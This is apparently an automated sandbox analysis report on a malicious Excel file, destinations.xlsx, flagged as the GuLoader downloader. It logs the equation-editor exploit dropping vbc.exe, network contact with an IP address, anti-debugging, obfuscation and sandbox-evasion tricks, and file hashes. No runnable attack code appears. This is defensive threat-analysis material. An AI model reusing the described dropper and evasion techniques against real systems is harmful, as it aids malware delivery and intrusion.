Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153

Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D127D2C.emf

Jump to behavior

Source: global traffic

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A557A	4_2_002A557A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B474A	4_2_002B474A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002AE400	4_2_002AE400
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A087E	4_2_002A087E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B00B4	4_2_002B00B4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A00C6	4_2_002A00C6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002AECDD	4_2_002AECDD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A7574	4_2_002A7574
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00294AA2	4_2_00294AA2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B130A	4_2_002B130A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A4B8B	4_2_002A4B8B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A6BF6	4_2_002A6BF6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B1BCE	4_2_002B1BCE

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 4_2_002A557A NtAllocateVirtualMemory,

4_2_002A557A

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: vbc[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$destinations.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDE0E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/15@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041A474 push ebp; ret	4_2_0041A4CD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040E9CB push ecx; retf	4_2_0040E9CC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004191F0 push ecx; ret	4_2_004191F1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004131A3 push ecx; ret	4_2_004132DD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004086CE push eax; retf	4_2_004086CF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00411ACE push ecx; ret	4_2_00411B05
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004132DE push ecx; ret	4_2_0041331D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041729D push edx; retf	4_2_004172A6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040DAAA push ecx; ret	4_2_0040DAD5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040E6B3 push ecx; ret	4_2_0040E6C1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00417AB9 push eax; ret	4_2_00417AC3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040A750 push ss; retf	4_2_0040A751
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00411B06 push ecx; ret	4_2_00411B05
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00407B81 push esi; retf	4_2_00407B83
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B4084 push FFFFFF94h; retf	4_2_00292B65
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00291611 push esi; iretd	4_2_0029167D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00292A10 push FFFFFF94h; retf	4_2_00292B65
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0029465A push ebx; retf	4_2_00294661
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00291327 push esi; iretd	4_2_0029167D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00291366 push esi; iretd	4_2_0029167D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002967BC push es; ret	4_2_002967F4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A6BF6 push FFFFFF94h; retf	4_2_00292B65

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2844

Thread sleep time: -240000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_002AF8DA rdtsc

4_2_002AF8DA

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_002AF8DA rdtsc

4_2_002AF8DA

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002AC054 mov eax, dword ptr fs:[00000030h]	4_2_002AC054
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002AE990 mov eax, dword ptr fs:[00000030h]	4_2_002AE990
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A46A0 mov eax, dword ptr fs:[00000030h]	4_2_002A46A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B1BCE mov eax, dword ptr fs:[00000030h]	4_2_002B1BCE

Source: C:\Users\Public\vbc.exe

Code function: 4_2_002B474A RtlAddVectoredExceptionHandler,

4_2_002B474A

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

ID:	502631
Product:	CloudBasic
Start time:	07:36:33
Start date:	14.10.2021
Sample:	destinations.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	a4bb01370caeb6363f6dc7923585481e
SHA1:	3eff08923d9b179edcc99fe52d95a46755eac939
SHA256:	c45eacade4845c8cf141724b92d6fd4401d30233b18b17e295d2d7a9a8944c40
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	8777020A37B6797241A489A707B9784B	A1ED1029B967295F9CE5E9D219F41DC6C7FC4D1A	8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21EEA90B.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\511BE33D.png	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced	9F9A7311810407794A153B7C74AED720	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\528BF790.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D127D2C.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	D57A36414E1F432B9F2EADCA1F32EA87	357610FE63E07D4948AB4C3028E0A28D1F5E11F3	1303048ECEE15E6A8E52DB06CBEFC973BE8B4AF6FF0A292B7D98F979CBAC6FB3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BE9D81A.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6E478DD9.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7AB1F435.png	PNG image data, 838 x 469, 8-bit colormap, non-interlaced	5A25F525D9F0D658AF52A4F78FE031D4	525FB63F75E745FBC90E4E42E624E030C5DF94EB	D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC8064F.png	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced	9F9A7311810407794A153B7C74AED720	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1845553.png	PNG image data, 838 x 469, 8-bit colormap, non-interlaced	5A25F525D9F0D658AF52A4F78FE031D4	525FB63F75E745FBC90E4E42E624E030C5DF94EB	D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC62CC04.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2D26738.png	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced	9B8C6AB5CD2CC1A2622CC4BB10D745C0	E3C68E3F16AE0A3544720238440EDCE12DFC900E	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB8384B2.png	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced	9B8C6AB5CD2CC1A2622CC4BB10D745C0	E3C68E3F16AE0A3544720238440EDCE12DFC900E	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
C:\Users\user\Desktop\~$destinations.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8777020A37B6797241A489A707B9784B	A1ED1029B967295F9CE5E9D219F41DC6C7FC4D1A	8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90

Windows Analysis Report destinations.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs